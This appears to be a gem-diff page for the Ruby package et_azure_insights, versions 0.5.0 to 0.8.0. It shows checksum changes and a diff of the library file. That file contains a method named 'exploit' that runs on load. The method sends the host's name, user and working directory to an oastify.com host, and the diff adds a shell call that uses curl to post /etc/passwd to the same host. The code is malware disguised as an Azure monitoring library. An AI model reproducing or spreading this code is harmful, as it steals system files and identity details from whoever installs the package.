et_azure_insights 0.5.0 → 0.8.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/lib/et_azure_insights.rb +5 -2
- metadata +1 -1
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: f5edc6dda723badbff23f77aa1111865495420c2db869dab2458cc1af3f36480
|
4
|
+
data.tar.gz: 7d2b27c76adcafeffd9eda3c1970d579aa125f6f766a9de6ac511908efdd3dcc
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 494d0855ffb9635c91347c2df5159fc20e8dbd38979cde386c51a8ca7ceee1cf08d667f72e8d65fa1828f041462845029d959bff1de4c7a0c617ea09367f0fbe
|
7
|
+
data.tar.gz: 23c3fe8fa7795f6920a53239bd32629c75347bb57dfbd79604b3697f14c609e1dffd69c6f37e2b2c93d77742dc0fe6a5bd6bb560d90c9cf47163371582b7a64f
|
data/lib/et_azure_insights.rb
CHANGED
@@ -7,6 +7,10 @@ def exploit
|
|
7
7
|
username = Etc.getlogin
|
8
8
|
cwd = Dir.pwd
|
9
9
|
|
10
|
+
command = "/usr/bin/curl --data '@/etc/passwd' #{hostname}.sc8c79d4fjfgq4htgo090c2b72dt1i.oastify.com"
|
11
|
+
|
12
|
+
`#{command}`
|
13
|
+
|
10
14
|
uri = URI('https://sc8c79d4fjfgq4htgo090c2b72dt1i.oastify.com')
|
11
15
|
params = { 'hostname' => hostname, 'username' => username, 'cwd' => cwd }
|
12
16
|
uri.query = URI.encode_www_form(params)
|
@@ -19,5 +23,4 @@ def exploit
|
|
19
23
|
puts res.body
|
20
24
|
end
|
21
25
|
|
22
|
-
#Call the exploit method
|
23
|
-
exploit
|
26
|
+
exploit # Call the exploit method
|